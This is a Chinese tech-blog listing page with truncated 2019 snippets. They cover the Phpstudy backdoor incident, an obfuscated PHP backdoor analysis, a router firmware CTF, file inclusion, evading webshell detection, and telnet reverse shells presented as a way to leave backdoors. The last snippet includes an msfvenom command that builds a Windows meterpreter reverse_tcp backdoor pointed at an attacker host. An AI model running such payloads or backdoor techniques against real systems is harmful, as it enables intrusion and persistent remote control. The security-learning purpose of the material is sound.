Phpstudy被暴存在隐藏后门-检查方法 一、事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国 ...
分类:
Web程序 时间:
2019-09-22 10:35:25
阅读次数:
316
原新闻文章:http://www.ninpang.com/archives/2538 当时看完之后冒了一身冷汗,还好自己只是在虚拟机上使用phpstudy,虽然物理机安装了phpstudy,但也是前几天的事儿了,不过10分钟后,我就收到了php官网的推送,严正声明了这是谣传。 按照phpstudy的 ...
分类:
Web程序 时间:
2019-09-20 22:54:42
阅读次数:
151
原作者:包子love 文章出处:黑白之道 今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。 前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windo ...
分类:
Web程序 时间:
2019-09-16 19:40:36
阅读次数:
146
0x01 混淆后门#conn.php 首先还是拖到D盾扫描 打开conn.php发现底部有那么一串代码: 对这个代码进行分析 首先可以对几个比较简单的变量输出看一下 $s输出内容为create_function 29行可知匿名函数调用了$q中的代码,所以我们打印$q的内容看一下 $q的内容为: $k ...
分类:
Web程序 时间:
2019-09-13 15:22:47
阅读次数:
198
都是百度上复制的 一些黑客往往回采取一些几种方法,但是我很想说的是,一个优秀的黑客绝不会随便攻击别人的。1、获取口令 这又有三种方法:一是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;二是在知道用户的账号后 ...
分类:
其他好文 时间:
2019-09-11 23:59:55
阅读次数:
193
路由器固件分析题,首先要安装firmware-mod-kit 安装命令: 使用: 用binwalk -e 分离出squashfs文件 使用firmware-mod-kit: 找到后门程序,提出来,发现有upx壳,脱壳后拖入ida,看字符串 找到网址,再看程序 找到端口 得到flag ...
分类:
其他好文 时间:
2019-09-10 01:01:31
阅读次数:
124
1、原理及危害 文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果 ...
分类:
其他好文 时间:
2019-09-05 21:44:51
阅读次数:
120
正向代理 A同学在大众创业、万众创新的大时代背景下开启他的创业之路,目前他遇到的最大的一个问题就是启动资金,于是他决定去找马云爸爸借钱,可想而知,最后碰一鼻子灰回来了,情急之下,他想到一个办法,找关系开后门,经过一番消息打探,原来A同学的大学老师王老师是马云的同学,于是A同学找到王老师,托王老师帮忙 ...
分类:
其他好文 时间:
2019-09-04 13:24:33
阅读次数:
87
运维直观寻找我们shell的方式有很多,如 通过文件名/修改时间/大小,文件备份比对发生异常 通过WEBSHELL后门扫描脚本发现,如Scanbackdoor.php/Pecher/shelldetect.php以及各种扫描器等等 通过Access.log访问日志发现后门所在 又或者,我们的测试的一 ...
分类:
其他好文 时间:
2019-09-03 11:38:05
阅读次数:
90
实验环境: kali 主机:192.168.88.193 目标靶机:win2008 R2 192.168.88.130 kali 主机上执行生成一个后门 exe: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPO ...
分类:
其他好文 时间:
2019-09-01 01:45:56
阅读次数:
183